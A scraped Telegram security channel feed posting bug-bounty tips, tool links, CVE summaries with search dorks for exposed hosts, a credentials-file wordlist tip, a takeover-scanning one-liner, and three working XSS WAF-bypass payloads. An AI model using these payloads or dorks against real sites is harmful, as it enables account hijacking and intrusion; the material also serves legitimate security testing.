Brut Security – Telegram
Brut Security
14.6K subscribers
904 photos
72 videos
287 files
957 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
🧑‍💻CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others

https://github.com/spyboy-productions/CloakQuest3r
2🔥12👍3
☄️Argus - The Ultimate Reconnaissance Toolkit 🔍
Argus is an all-in-one information gathering tool crafted for ethical hackers and cybersecurity experts. It seamlessly integrates network analysis, web exploration, and threat detection, all in a sleek and intuitive interface. Argus turns complex reconnaissance into an art of simplicity.
---
🌐https://github.com/jasonxtn/Argus
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
CVE-2024-9634: RCE in GiveWP WordPress Plugin, 9.8 rating 🔥

Another one critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.

Search at Netlas.io:
👉 Link: https://nt.ls/9tUYx
👉 Dork: http.body:"plugins/give/assets/dist"

Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
👍53
Add the file yahoo_site_admin/credentials/db.conf to your wordlist, and you might discover some juicy data.
110
TryHackMe is now giving subnoscriptions in INR
1👍8🔥2
POC for CVE-2024-4577 PHP CGI Argument Injection 🔥 🔥 🔥

Nuclei Template:
https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
19👍2
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
👍81
80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)
👍29🔥4🗿31
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥

The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.

More then 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
3🗿2👍1
Happy Sunday 🫶
🗿22🔥42👍1
Wordpress juicy endpoints #bugbountytips
1👍9
⚡️Found a security vulnerability in any site?
Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips
16🔥3🐳1
A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips
1🔥9🐳3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1🔥5👍4🐳2
Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 


#cybersec #bugbountytips #infosec
1👍10🗿3🐳1